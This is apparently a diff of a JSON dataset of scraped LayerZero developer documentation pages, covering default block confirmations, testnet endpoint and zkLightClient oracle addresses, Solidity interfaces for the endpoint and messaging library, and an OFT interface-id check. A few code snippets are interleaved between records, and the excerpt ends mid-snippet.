ChainId . DFK_TESTNET ] : 1 , [ ChainId . HARMONY_TESTNET ] : 5 , [ ChainId . MOONBEAM_TESTNET ] : 3 , [ ChainId . CASTLECRUSH_TESTNET ] : 1 , [ ChainId . GOERLI ] : 3 , [ ChainId . ARBITRUM_GOERLI ] : 3 , [ ChainId . OPTIMISM_GOERLI ] : 3 , [ ChainId . INTAIN_TESTNET ] : 1 , [ ChainId . CELO_TESTNET ] : 1 , [ ChainId . FUSE_TESTNET ] : 1 , [ ChainId . APTOS_TESTNET ] : 10 , [ ChainId . DOS_TESTNET ] : 1 , [ ChainId . ZKSYNC_TESTNET ] : 10 , [ ChainId . SHRAPNEL_TESTNET ] : 1 , [ ChainId . KLAYTN_TESTNET ] : 1 , [ ChainId . METIS_TESTNET ] : 1 , [ ChainId . COREDAO_TESTNET ] : 1 , [ ChainId . 
GNOSIS_TESTNET ] : 1 , } Transactions originating from the above chains should be delivered after a minimum of the specified source Block Confirmations Previous Testnet Addresses Next - Technical Reference Mainnet Last modified 3mo ago", + "body": "Default Config User Applications default configuration To simplify writing a User Application contract, LayerZero does not require any configuration. In this case, a UA sending messages will be using the system defaults. The Default Configuration Oracle: Google Cloud Provider Relayer: LayerZero Labs Library Version: 1 Outbound Proof Type: 1, MPT Outbound Confirmations: 4 Inbound Proof Library: 1, MPT Inbound Confirmation: 4 Sending messages Default _adapterParams Type: Version 1 Gas Amount: 200,000 Default Block Confirmation // These are the default amount of block confirmations waiting before delivering messages (TESTNET) const defaultBlockConfs = { [ ChainId . BSC_TESTNET ] : 5 , [ ChainId . FUJI ] : 6 , [ ChainId . MUMBAI ] : 10 , [ ChainId . FANTOM_TESTNET ] : 7 , [ ChainId . SWIMMER_TESTNET ] : 5 , [ ChainId . DFK_TESTNET ] : 1 , [ ChainId . HARMONY_TESTNET ] : 5 , [ ChainId . MOONBEAM_TESTNET ] : 3 , [ ChainId . CASTLECRUSH_TESTNET ] : 1 , [ ChainId . GOERLI ] : 3 , [ ChainId . ARBITRUM_GOERLI ] : 3 , [ ChainId . OPTIMISM_GOERLI ] : 3 , [ ChainId . INTAIN_TESTNET ] : 1 , [ ChainId . CELO_TESTNET ] : 1 , [ ChainId . FUSE_TESTNET ] : 1 , [ ChainId . APTOS_TESTNET ] : 10 , [ ChainId . DOS_TESTNET ] : 1 , [ ChainId . ZKSYNC_TESTNET ] : 10 , [ ChainId . SHRAPNEL_TESTNET ] : 1 , [ ChainId . KLAYTN_TESTNET ] : 1 , [ ChainId . METIS_TESTNET ] : 1 , [ ChainId . COREDAO_TESTNET ] : 1 , [ ChainId . GNOSIS_TESTNET ] : 1 , } Transactions originating from the above chains should be delivered after a minimum of the specified source Block Confirmations Previous Testnet Addresses Next - Technical Reference Mainnet Last modified 1d ago", "labels": [ "Documentation" ] @@ -1706,7 +1706,7 @@ { "title": "Testnet Addresses", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/testnet/testnet-addresses", - "body": "Testnet Addresses Supported Chains (Testnet)To send and receive messages, LayerZero endpoints use a chainId to identify different blockchains. Below is a table of the supported test networks along with their unique chainId.Review carefully. LayerZero assigns proprietary IDs to each chain. Official Endpoint Addresses (TESTNET) Note: chainId values are not related to EVM IDs. Since LayerZero will span EVM & non-EVM chains the chainId are proprietary to our Endpoints. These are the addresses of the contracts on which you would call send() By the way, if you want to go straight to mainnet , look no further. 
Goerli (Ethereum Testnet) chainId : 10121 endpoint : 0xbfD2135BFfbb0B5378b56643c2Df8a87552Bfa23 BNB Chain (Testnet) chainId : 10102 endpoint : 0x6Fcb97553D41516Cb228ac03FdC8B9a0a9df04A1 Fuji (Avalanche Testnet) chainId : 10106 endpoint : 0x93f54D755A063cE7bB9e6Ac47Eccc8e33411d706 Aptos (Testnet) chainId : 10108 endpoint : 0x1759cc0d3161f1eb79f65847d4feb9d1f74fb79014698a23b16b28b9cd4c37e3 Mumbai (Polygon Testnet) chainId : 10109 endpoint : 0xf69186dfBa60DdB133E91E9A4B5673624293d8F8 Fantom (Testnet) chainId : 10112 endpoint : 0x7dcAD72640F835B0FA36EFD3D6d3ec902C7E5acf Arbitrum-Goerli (Testnet) chainId : 10143 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Optimism-Goerli (Testnet) chainId : 10132 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Harmony (Testnet) chainId : 10133 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Moonbeam (Testnet) chainId : 10126 endpoint : 0xb23b28012ee92E8dE39DEb57Af31722223034747 Celo (Testnet) chainId : 10125 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Dexalot (Testnet) chainId : 10118 endpoint : 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Portal Fantasy (Testnet) chainId : 10128 endpoint : 0xd682ECF100f6F4284138AA925348633B0611Ae21 Klaytn (Testnet) chainId : 10150 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Metis (Testnet) chainId : 10151 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 CoreDao (Testnet) chainId : 10153 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Gnosis (Testnet) chainId : 10145 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 zkSync (Testnet) chainId : 10165 endpoint : 0x093D2CF57f764f09C3c2Ac58a42A2601B8C79281 OKX (Testnet) chainId : 10155 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Base (Testnet) chainId : 10160 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Meter (Testnet) chainId : 10156 endpoint : 0x3De2f3D1Ac59F18159ebCB422322Cb209BA96aAD Linea (ConsenSys zkEVM - Testnet) chainId : 10157 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab DOS (Testnet) chainId : 10162 endpoint : 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Sepolia (Testnet) chainId : 10161 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Polygon zkEVM (Testnet) chainId : 10158 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Scroll (Testnet) chainId : 10170 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Tenet (Testnet) chainId : 10173 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Canto (Testnet) chainId : 10159 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Kava (Testnet) chainId : 10172 endpoint : 0x8b14D287B4150Ff22Ac73DF8BE720e933f659abc Orderly (Testnet - opstack) chainId : 10200 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 BlockGen (Testnet) chainId : 10177 endpoint : 0x55370E0fBB5f5b8dAeD978BA1c075a499eB107B8 MeritCircle (Testnet) chainId : 10178 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Mantle (Testnet) chainId : 10181 endpoint : 0x2cA20802fd1Fd9649bA8Aa7E50F0C82b479f35fe Hubble (Testnet) chainId : 10182 endpoint : 0x8b14D287B4150Ff22Ac73DF8BE720e933f659abc Aavegotchi (Testnet) chainId : 10191 endpoint : 0xfeBE4c839EFA9f506C092a32fD0BB546B76A1d38 Loot (Testnet) chainId : 10197 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Telos (Testnet) chainId : 10199 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Zora (Testnet) chainId : 10195 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Tomo (Testnet) chainId : 10196 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 opBNB (Testnet) chainId : 10202 endpoint : 
0x83c73Da98cf733B03315aFa8758834b36a195b87 Shimmer (Testnet) chainId : 10203 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Aurora (Testnet) chainId : 10201 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Lif3 (Testnet) chainId : 10205 endpoint : 0x55370E0fBB5f5b8dAeD978BA1c075a499eB107B8 Technical Reference - Previous Testnet Next Default Config Last modified 26d ago", + "body": "Testnet Addresses Supported Chains (Testnet)To send and receive messages, LayerZero endpoints use a chainId to identify different blockchains. Below is a table of the supported test networks along with their unique chainId.Review carefully. LayerZero assigns proprietary IDs to each chain. Official Endpoint Addresses (TESTNET) Note: chainId values are not related to EVM IDs. Since LayerZero will span EVM & non-EVM chains the chainId are proprietary to our Endpoints. These are the addresses of the contracts on which you would call send() By the way, if you want to go straight to mainnet , look no further. Goerli (Ethereum Testnet) chainId : 10121 endpoint : 0xbfD2135BFfbb0B5378b56643c2Df8a87552Bfa23 BNB Chain (Testnet) chainId : 10102 endpoint : 0x6Fcb97553D41516Cb228ac03FdC8B9a0a9df04A1 Fuji (Avalanche Testnet) chainId : 10106 endpoint : 0x93f54D755A063cE7bB9e6Ac47Eccc8e33411d706 Aptos (Testnet) chainId : 10108 endpoint : 0x1759cc0d3161f1eb79f65847d4feb9d1f74fb79014698a23b16b28b9cd4c37e3 Mumbai (Polygon Testnet) chainId : 10109 endpoint : 0xf69186dfBa60DdB133E91E9A4B5673624293d8F8 Fantom (Testnet) chainId : 10112 endpoint : 0x7dcAD72640F835B0FA36EFD3D6d3ec902C7E5acf Arbitrum-Goerli (Testnet) chainId : 10143 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Optimism-Goerli (Testnet) chainId : 10132 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Harmony (Testnet) chainId : 10133 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Moonbeam (Testnet) chainId : 10126 endpoint : 0xb23b28012ee92E8dE39DEb57Af31722223034747 Celo (Testnet) chainId : 10125 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Dexalot (Testnet) chainId : 10118 endpoint : 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Portal Fantasy (Testnet) chainId : 10128 endpoint : 0xd682ECF100f6F4284138AA925348633B0611Ae21 Klaytn (Testnet) chainId : 10150 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Metis (Testnet) chainId : 10151 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 CoreDao (Testnet) chainId : 10153 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Gnosis (Testnet) chainId : 10145 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 zkSync (Testnet) chainId : 10165 endpoint : 0x093D2CF57f764f09C3c2Ac58a42A2601B8C79281 OKX (Testnet) chainId : 10155 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Base (Testnet) chainId : 10160 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Meter (Testnet) chainId : 10156 endpoint : 0x3De2f3D1Ac59F18159ebCB422322Cb209BA96aAD Linea (ConsenSys zkEVM - Testnet) chainId : 10157 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab DOS (Testnet) chainId : 10162 endpoint : 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Sepolia (Testnet) chainId : 10161 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Polygon zkEVM (Testnet) chainId : 10158 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Scroll Sepolia (Testnet) chainId : 10214 endpoint : 0x6098e96a28E02f27B1e6BD381f870F1C8Bd169d3 Tenet (Testnet) chainId : 10173 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Canto (Testnet) chainId : 10159 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Kava 
(Testnet) chainId : 10172 endpoint : 0x8b14D287B4150Ff22Ac73DF8BE720e933f659abc Orderly (Testnet - opstack) chainId : 10200 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 BlockGen (Testnet) chainId : 10177 endpoint : 0x55370E0fBB5f5b8dAeD978BA1c075a499eB107B8 MeritCircle (Testnet) chainId : 10178 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Mantle (Testnet) chainId : 10181 endpoint : 0x2cA20802fd1Fd9649bA8Aa7E50F0C82b479f35fe Hubble (Testnet) chainId : 10182 endpoint : 0x8b14D287B4150Ff22Ac73DF8BE720e933f659abc Aavegotchi (Testnet) chainId : 10191 endpoint : 0xfeBE4c839EFA9f506C092a32fD0BB546B76A1d38 Loot (Testnet) chainId : 10197 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Telos (Testnet) chainId : 10199 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Zora (Testnet) chainId : 10195 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Tomo (Testnet) chainId : 10196 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 opBNB (Testnet) chainId : 10202 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Shimmer (Testnet) chainId : 10203 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Aurora (Testnet) chainId : 10201 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Lif3 (Testnet) chainId : 10205 endpoint : 0x55370E0fBB5f5b8dAeD978BA1c075a499eB107B8 Conflux (Testnet) chainId : 10211 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Horizen EON (Testnet) chainId : 10215 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 XPLA (Testnet) chainId : 10216 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Astar (evm testnet) chainId : 10210 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 zKatana (Astar zkevm testnet) chainId : 10220 endpoint : 0x6098e96a28E02f27B1e6BD381f870F1C8Bd169d3 Manta (Testnet) chainId : 10221 endpoint : 0x55370E0fBB5f5b8dAeD978BA1c075a499eB107B8 Technical Reference - Previous Testnet Next Default Config Last modified 5d ago", "labels": [ "Documentation" ] @@ -1714,7 +1714,7 @@ { "title": "zkLightClient Addresses", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/overview-of-polyhedra-zklightclient/zklightclient-addresses", - "body": "zkLightClient Addresses Contract Addresses to use zkLightClient with LayerZero To use the Polyhedra zkLightClient with your LayerZero UserApplication, configure your app with the oracle addresses below. 
zkLightClient Addresses (Mainnets) Ethereum 0x394ee343625B83B5778d6F42d35142bdf26dBAcD BNB Smart Chain 0x76ce31EfB81a013b609CeeF1Cc4F4E5aEeA70B7f Polygon 0x9D88a2f4253b106A1F8e169485490f7230b4276e CoreDAO: 0x6590C7e65EEC453a78199B0bE418dF7291DF9039 Avalanche 0xD59DdbF4c0E1ed3debD2f7afFc1fA9dEF198A652 Fantom 0x7cE1fab01F3cd7253731a9e11180d49ac960285C Optimism 0x40b237EDdb5B851C60630446ca120A1D5c7B6253 Arbitrum One 0x2274D83ed2B4c1fCd6C1CCBF9b734F7e436DfD44 Moonbeam0xE04E090a49aE0AF87583B808B05d2dc8c4d1E712 Gnosis Chain 0xFd1fabb34c4D6B5D30a1bFE2Fa76Cc15206fb368 Metis 0x057DCB38db5350Db12DCD94428c303D523f72153 Arbitrum Nova 0xD2C51b14cA69D7E557719A8534e1c5514f28DB3b zkLightClient Addresses (Testnets) Ethereum Goerli Testnet: 0x55d193eF196Be455c9c178b0984d7F9cE750CCb4 BNB Smart Chain Testnet: 0x2C41853Ed4681A39c89c61Cdeb8c155561391215 Avalanche Fuji Testnet: 0x8517BA5E3eda338d9707a7B4a36033331e3d3B00 Optimism Goerli Testnet: 0x1853f53Aa7d9f6aF8537833c4255f928ab8F9D61 Arbitrum Goerli Testnet: 0xbFB5FEE3DCf2aF08F9f7a05049806fBC2E72A702 Previous zkLightClient on LayerZero Next - Technical Reference Testnet Last modified 16d ago", + "body": "zkLightClient Addresses Contract Addresses to use zkLightClient with LayerZero To use the Polyhedra zkLightClient with your LayerZero UserApplication, configure your app with the oracle addresses below. zkLightClient Addresses (Mainnets) Ethereum 0x394ee343625B83B5778d6F42d35142bdf26dBAcD BNB Smart Chain 0x76ce31EfB81a013b609CeeF1Cc4F4E5aEeA70B7f Polygon 0x9D88a2f4253b106A1F8e169485490f7230b4276e CoreDAO: 0x6590C7e65EEC453a78199B0bE418dF7291DF9039 Avalanche 0xD59DdbF4c0E1ed3debD2f7afFc1fA9dEF198A652 Fantom 0x7cE1fab01F3cd7253731a9e11180d49ac960285C Optimism 0x40b237EDdb5B851C60630446ca120A1D5c7B6253 Arbitrum One 0x2274D83ed2B4c1fCd6C1CCBF9b734F7e436DfD44 Moonbeam 0xE04E090a49aE0AF87583B808B05d2dc8c4d1E712 Gnosis Chain 0xFd1fabb34c4D6B5D30a1bFE2Fa76Cc15206fb368 Metis 0x057DCB38db5350Db12DCD94428c303D523f72153 Arbitrum Nova 0xD2C51b14cA69D7E557719A8534e1c5514f28DB3b zkLightClient Addresses (Testnets) Ethereum Goerli Testnet: 0x55d193eF196Be455c9c178b0984d7F9cE750CCb4 BNB Smart Chain Testnet: 0x2C41853Ed4681A39c89c61Cdeb8c155561391215 Avalanche Fuji Testnet: 0x8517BA5E3eda338d9707a7B4a36033331e3d3B00 Optimism Goerli Testnet: 0x1853f53Aa7d9f6aF8537833c4255f928ab8F9D61 Arbitrum Goerli Testnet: 0xbFB5FEE3DCf2aF08F9f7a05049806fBC2E72A702 Previous zkLightClient on LayerZero Next - Technical Reference Testnet Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1722,127 +1722,127 @@ { "title": "zkLightClient on LayerZero", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/overview-of-polyhedra-zklightclient/zklightclient-on-layerzero", - "body": "zkLightClient on LayerZero Integrating Polyhedra zkLightClient technology into LayerZero LayerZero is an omnichain interoperability protocol that enables cross-chain messaging. Applications built using blockchain technology (decentralized applications) can use the LayerZero protocol to connect to 30+ supported blockchains seamlessly. This allows dApp users to interact securely and efficiently with assets across chains. Polyhedra's zkLightClient technology is fully integrated with LayerZero's messaging protocol, so application developers can use zero-knowledge-proof technology without barriers. Developers can easily build cross-chain applications on top of LayerZero through its extensive developer tooling and community support.
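To route a UA's traffic through one of the oracle addresses above, the UA calls setConfig on its endpoint for each remote chain, since the endpoint scopes configuration to msg.sender. A minimal sketch; CONFIG_TYPE_ORACLE = 6 follows ULNv2's config-type convention but is an assumption here, as are the contract and function names:

```solidity
// Sketch only: a User Application pointing its ULNv2 config at a custom oracle.
// CONFIG_TYPE_ORACLE = 6 is an assumption based on ULNv2's config-type convention;
// contract and function names are illustrative.
pragma solidity ^0.8.17;

interface IEndpointConfigLike {
    function setConfig(uint16 _version, uint16 _chainId, uint256 _configType, bytes calldata _config) external;
}

contract OracleConfigExample {
    uint256 internal constant CONFIG_TYPE_ORACLE = 6; // assumed ULNv2 constant
    IEndpointConfigLike public immutable endpoint;

    constructor(address _endpoint) {
        endpoint = IEndpointConfigLike(_endpoint);
    }

    // The endpoint scopes configuration to msg.sender, so the UA must make this call itself.
    function setOracle(uint16 version, uint16 remoteChainId, address oracle) external {
        // production code would restrict this to an owner or admin
        endpoint.setConfig(version, remoteChainId, CONFIG_TYPE_ORACLE, abi.encode(oracle));
    }
}
```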
Incorporating Polyhedra zkLightClient technology into Layerzero Network LayerZero's ULNv2 validation library relies on two parties, the Oracle and Relayer, to transfer messages between on-chain endpoints. When LayerZero sends a message from chain A to chain B, the message is routed through the endpoint on chain A to the ULNv2 validation library. The ULNv2 library notifies the Oracle and Relayer of the message and its destination chain. The Oracle forwards the packet hash to the endpoint on chain B, and the Relayer submits the packet to be verified on-chain against the hash and delivers the message. On-chain light clients allow for the source chain's validator set to attest to something that occurred on their chain to a destination chain. In conjunction with other libraries, light clients add a layer of security on top of the LayerZero messaging protocol. On-chain transaction verification has been cost-prohibitive to the tune of $50m-$100m/day per pair-wise chain connected to Ethereum due to the presence of extensive transaction logs, which are necessary for the proof but not for the application itself. Polyhedra's zkLightClient technology, built on LayerZero, harnesses the compression of ZKP technology and reduces the on-chain verification tremendously with lower latency by using efficient ZKP protocols. In addition, multiple transaction verifications can be batched into a single zero-knowledge proof. Previous Overview of Polyhedra zkLightClient Next zkLightClient Addresses Last modified 15d ago", + "body": "zkLightClient on LayerZero Integrating Polyhedra zkLightClient technology into LayerZero LayerZero is an omnichain interoperability protocol that enables cross-chain messaging. Applications built using blockchain technology (decentralized applications) can use the LayerZero protocol to connect to 30+ supported blockchains seamlessly. This allows dApp users to interact securely and efficiently with assets across chains. Polyhedra's zkLightClient technology is fully integrated with LayerZero's messaging protocol, so application developers can use zero-knowledge-proof technology without barriers. Developers can easily build cross-chain applications on top of LayerZero through its extensive developer tooling and community support. Incorporating Polyhedra zkLightClient technology into LayerZero Network LayerZero's ULNv2 validation library relies on two parties, the Oracle and Relayer, to transfer messages between on-chain endpoints. When LayerZero sends a message from chain A to chain B, the message is routed through the endpoint on chain A to the ULNv2 validation library. The ULNv2 library notifies the Oracle and Relayer of the message and its destination chain. The Oracle forwards the packet hash to the endpoint on chain B, and the Relayer submits the packet to be verified on-chain against the hash and delivers the message. On-chain light clients allow for the source chain's validator set to attest to something that occurred on their chain to a destination chain. In conjunction with other libraries, light clients add a layer of security on top of the LayerZero messaging protocol. On-chain transaction verification has been cost-prohibitive to the tune of $50m-$100m/day per pair-wise chain connected to Ethereum due to the presence of extensive transaction logs, which are necessary for the proof but not for the application itself.
Polyhedra's zkLightClient technology, built on LayerZero, harnesses the compression of ZKP technology and reduces the on-chain verification tremendously with lower latency by using efficient ZKP protocols. In addition, multiple transaction verifications can be batched into a single zero-knowledge proof. Previous Overview of Polyhedra zkLightClient Next zkLightClient Addresses Last modified 1mo ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroEndpoint", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzeroendpoint", - "body": "ILayerZeroEndpoint // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; import \"./ILayerZeroUserApplicationConfig.sol\" ; interface ILayerZeroEndpoint is ILayerZeroUserApplicationConfig { // @notice send a LayerZero message to the specified address at a LayerZero endpoint. // @param _dstChainId - the destination chain identifier // @param _destination - the address on destination chain (in bytes). address length/format may vary by chains // @param _payload - a custom bytes payload to send to the destination contract // @param _refundAddress - if the source transaction is cheaper than the amount of value passed, refund the additional amount to this address // @param _zroPaymentAddress - the address of the ZRO token holder who would pay for the transaction // @param _adapterParams - parameters for custom functionality. e.g. receive airdropped native gas from the relayer on destination function send ( uint16 _dstChainId , bytes calldata _destination , bytes calldata _payload , address payable _refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; // @notice used by the messaging library to publish verified payload // @param _srcChainId - the source chain identifier // @param _srcAddress - the source contract (as bytes) at the source chain // @param _dstAddress - the address on destination chain // @param _nonce - the unbound message ordering nonce // @param _gasLimit - the gas limit for external contract execution // @param _payload - verified payload to send to the destination contract function receivePayload ( uint16 _srcChainId , bytes calldata _srcAddress , address _dstAddress , uint64 _nonce , uint _gasLimit , bytes calldata _payload ) external ; // @notice get the inboundNonce of a receiver from a source chain which could be EVM or non-EVM chain // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address function getInboundNonce ( uint16 _srcChainId , bytes calldata _srcAddress ) external view returns ( uint64 ); // @notice get the outboundNonce from this source chain which, consequently, is always an EVM // @param _srcAddress - the source chain contract address function getOutboundNonce ( uint16 _dstChainId , address _srcAddress ) external view returns ( uint64 ); // @notice gets a quote in source native gas, for the amount that send() requires to pay for message delivery // @param _dstChainId - the destination chain identifier // @param _userApplication - the user app address on this EVM chain // @param _payload - the custom message to send over LayerZero // @param _payInZRO - if false, user app pays the protocol fee in native token // @param _adapterParam - parameters for the adapter service, e.g. 
send some dust native token to dstChain function estimateFees ( uint16 _dstChainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParam ) external view returns ( uint nativeFee , uint zroFee ); // @notice get this Endpoint's immutable source identifier function getChainId () external view returns ( uint16 ); // @notice the interface to retry failed message on this Endpoint destination // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address // @param _payload - the payload to be retried function retryPayload ( uint16 _srcChainId , bytes calldata _srcAddress , bytes calldata _payload ) external ; // @notice query if any STORED payload (message blocking) at the endpoint. // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address function hasStoredPayload ( uint16 _srcChainId , bytes calldata _srcAddress ) external view returns ( bool ); // @notice query if the _libraryAddress is valid for sending msgs. // @param _userApplication - the user app address on this EVM chain function getSendLibraryAddress ( address _userApplication ) external view returns ( address ); // @notice query if the _libraryAddress is valid for receiving msgs. // @param _userApplication - the user app address on this EVM chain function getReceiveLibraryAddress ( address _userApplication ) external view returns ( address ); // @notice query if the non-reentrancy guard for send() is on // @return true if the guard is on. false otherwise function isSendingPayload () external view returns ( bool ); // @notice query if the non-reentrancy guard for receive() is on // @return true if the guard is on. false otherwise function isReceivingPayload () external view returns ( bool ); // @notice get the configuration of the LayerZero messaging library of the specified version // @param _version - messaging library version // @param _chainId - the chainId for the pending config change // @param _userApplication - the contract address of the user application // @param _configType - type of configuration. every messaging library has its own convention. function getConfig ( uint16 _version , uint16 _chainId , address _userApplication , uint _configType ) external view returns ( bytes memory ); // @notice get the send() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getSendVersion ( address _userApplication ) external view returns ( uint16 ); // @notice get the lzReceive() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getReceiveVersion ( address _userApplication ) external view returns ( uint16 ); } Previous ILayerZeroReceiver Next ILayerZeroMessagingLibrary Last modified 3mo ago", + "title": "IERC165 OFT Interface Ids", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/ierc165-oft-interface-ids", + "body": "IERC165 OFT Interface Ids Use these interface ids to determine which version of OFT is deployed. OFT(v1): 0x14e4ceea OFTV2: 0x1f7ecdf7 OFTWithFee: 0x6984a9e8 interface ERC165 { /// @notice Query if a contract implements an interface /// @param interfaceID The interface identifier, as specified in ERC-165 /// @dev Interface identification is specified in ERC-165. This function /// uses less than 30,000 gas. 
/// @return `true` if the contract implements `interfaceID` and /// `interfaceID` is not 0xffffffff, `false` otherwise function supportsInterface(bytes4 interfaceID) external view returns (bool); } Example Hardhat Task module . exports = async function ( taskArgs ) { const OFTInterfaceId = 0x14e4ceea ; const OFTV2InterfaceId = 0x1f7ecdf7 ; const OFTWithFeeInterfaceId = 0x6984a9e8 ; const ERC165ABI = [ \"function supportsInterface(bytes4) public view returns (bool)\" ]; try { const contract = await ethers . getContractAt ( ERC165ABI , taskArgs . address ); const isOFT = await contract . supportsInterface ( OFTInterfaceId ); const isOFTV2 = await contract . supportsInterface ( OFTV2InterfaceId ); const isOFTWithFee = await contract . supportsInterface ( OFTWithFeeInterfaceId ); if ( isOFT ) { console . log ( ` address: ${ taskArgs . address } is OFT(v1) ` ) } else if ( isOFTV2 ) { console . log ( ` address: ${ taskArgs . address } is OFTV2 ` ) } else if ( isOFTWithFee ) { console . log ( ` address: ${ taskArgs . address } is OFTWithFee ` ) } else { console . log ( ` address: ${ taskArgs . address } is not an OFT ` ) } } catch ( e ) { console . log ( \"supportsInterface not implemented\" ) } } Previous OFT Next OFT (V1) vs OFTV2 - Which should I use? Last modified 3mo ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroMessagingLibrary", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzeromessaginglibrary", - "body": "ILayerZeroMessagingLibrary // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; import \"./ILayerZeroUserApplicationConfig.sol\" ; interface ILayerZeroMessagingLibrary { // send(), messages will be inflight. function send ( address _userApplication , uint64 _lastNonce , uint16 _chainId , bytes calldata _destination , bytes calldata _payload , address payable refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; // estimate native fee at the send side function estimateFees ( uint16 _chainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParam ) external view returns ( uint nativeFee , uint zroFee ); //--------------------------------------------------------------------------- // setConfig / getConfig are User Application (UA) functions to specify Oracle, Relayer, blockConfirmations, libraryVersion function setConfig ( uint16 _chainId , address _userApplication , uint _configType , bytes calldata _config ) external ; function getConfig ( uint16 _chainId , address _userApplication , uint _configType ) external view returns ( bytes memory ); } Previous ILayerZeroEndpoint Next ILayerZeroUserApplicationConfig Last modified 3mo ago", + "title": "OFT (V1)", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oft-v1", + "body": "OFT (V1) Omnichain Fungible Token standard written to support EVM chains only. OFT.sol https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/oft/v1/OFT.sol Extensions ProxyOFT.sol Use this extension when you want to turn an already deployed ERC20 into an OFT. You can then deploy OFT contracts on the LayerZero supported chains of your choosing. When you want to transfer your OFT from the source chain the OFT will lock in the ProxyOFT and mint on the destination chain. When you come back to the ProxyOFT chain the OFT burns on the source chain and unlocks on the destination chain. 
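As an on-chain counterpart to the IERC165 Hardhat task above, the same three interface ids can be probed from Solidity. A sketch with illustrative names; note that, unlike the task's try/catch, this version reverts if the target does not implement supportsInterface:

```solidity
// Sketch only: probing which OFT flavor a token implements via ERC-165.
pragma solidity ^0.8.17;

interface IERC165Like {
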